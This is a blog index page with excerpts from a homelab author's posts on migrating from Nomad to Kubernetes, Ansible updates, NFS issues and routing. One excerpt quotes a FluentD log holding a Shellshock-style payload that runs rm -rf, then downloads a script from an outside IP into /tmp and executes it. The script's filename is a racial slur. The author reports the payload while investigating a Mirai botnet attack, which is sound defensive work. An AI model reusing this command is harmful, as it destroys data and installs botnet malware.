The HashiCorp Nomad and Kubernetes logos, connected with an arrow pointing from Nomad to Kubernetes

Nomad to k8s, Part 7: Ansible Plays for Host Updates

Wherein I add the Kubernetes nodes to my host update Ansible playbook. This is part eight of my k8s migration series. With the number of hosts I’ve now got in my Homelab, I definitely need a better way to update them than manually SSH’ing into each. So a while ago, I created an Ansible playbook to update all hosts in my Homelab. These updates are also one of the reasons I keep so many physical hosts, even if they’re individually relatively small: I want an environment where I can take down any given host for updates without anything at all breaking, and especially without having to take the entire lab down before a regular host update. ...

February 17, 2024 · 10 min · Michael

NFS problems with new Ubuntu 22.04 kernel

Yesterday’s Homelab host update did not at all go as intended. I hit a kernel bug in the NFS code. To describe the problem, I need to go into a bit of detail on my setup, so please bear with me. I’ve got a fleet of 8 Raspberry Pi CM4 and a single Udoo x86 II forming the backbone of the compute in my Homelab. All of them do netbooting, with no per-host storage at all. To be able to do host updates, including kernels, the boot files used for netbooting are separated per host, and each host’s files are mounted to that host’s /boot/firmware dir via NFS. It looks something like this: ...

February 17, 2024 · 6 min · Michael
The HashiCorp Nomad and Kubernetes logos, connected with an arrow pointing from Nomad to Kubernetes

Nomad to k8s, Part 6: Logging with FluentD, Fluentbit and Loki

Wherein I document how I migrated my logging setup from Nomad to k8s. This is part seven of my k8s migration series. Setup overview Let’s start with an overview of the setup. Overview of my logging pipeline. ...

February 13, 2024 · 30 min · Michael

Sunday Morning Panic

I just had a slight Sunday morning panic. I finished my logging setup yesterday night, and had a look at my FluentD logs this morning to see whether I got any errors or unparsed logs. At the very top of the logs, I got this entry: error="#<Fluent::Plugin::Parser::ParserError: pattern not matched with data '{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\", \"time\":\"2024-02-11T04:54:25+01:00\"}'>" location= tag=services.traefik.traefik.docker.anon time=1707623665 record="{ \"log\"=>\"{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\\\", \\\"time\\\":\\\"2024-02-11T04:54:25+01:00\\\" }\", \"logsubstream\"=>\"docker\", \"nomad_job_id\"=>\"traefik\", \"nomad_task_name\"=>\"traefik\", \"nomad_node_name\"=>\"anon\"}" message="dump an error event: error_class=Fluent::Plugin::Parser::ParserError error=\"pattern not matched with data '{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\\\", \\\"time\\\":\\\"2024-02-11T04:54:25+01:00\\\"}'\" location=nil tag=\"services.traefik.traefik.docker.anon\" time=2024-02-11 03:54:25.149520221 +0000 record={\"log\"=>\"{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\\\", \\\"time\\\":\\\"2024-02-11T04:54:25+01:00\\\"}\", \"logsubstream\"=>\"docker\", \"nomad_job_id\"=>\"traefik\", \"nomad_task_name\"=>\"traefik\", \"nomad_node_name\"=>\"anon\"}" host=anon level=warning That looked suspicious, to say the least. After some googling for the nigga.sh file, I landed on this page from Akamai. I describes an attack by the Mirai botnet. ...

February 11, 2024 · 4 min · Michael
The HashiCorp Nomad and Kubernetes logos, connected with an arrow pointing from Nomad to Kubernetes

Nomad to k8s, Part 2b: Asymmetric Routing

Wherein I ran into some problems with the Cilium BGP routing and firewalls on my OPNsense box. This is the second addendum for Cilium load balancing in my k8s migration series. While working on my S3 bucket migration, I ran into several rather weird problems. After switching my internal wiki over to using the Ceph RGW S3 from my k8s Ceph Rook cluster, I found that the final upload of the generated site to the S3 bucket from which it was served did not work, even though I had all the necessary firewall rules configured. The output I was getting looked like this: ...

February 4, 2024 · 10 min · Michael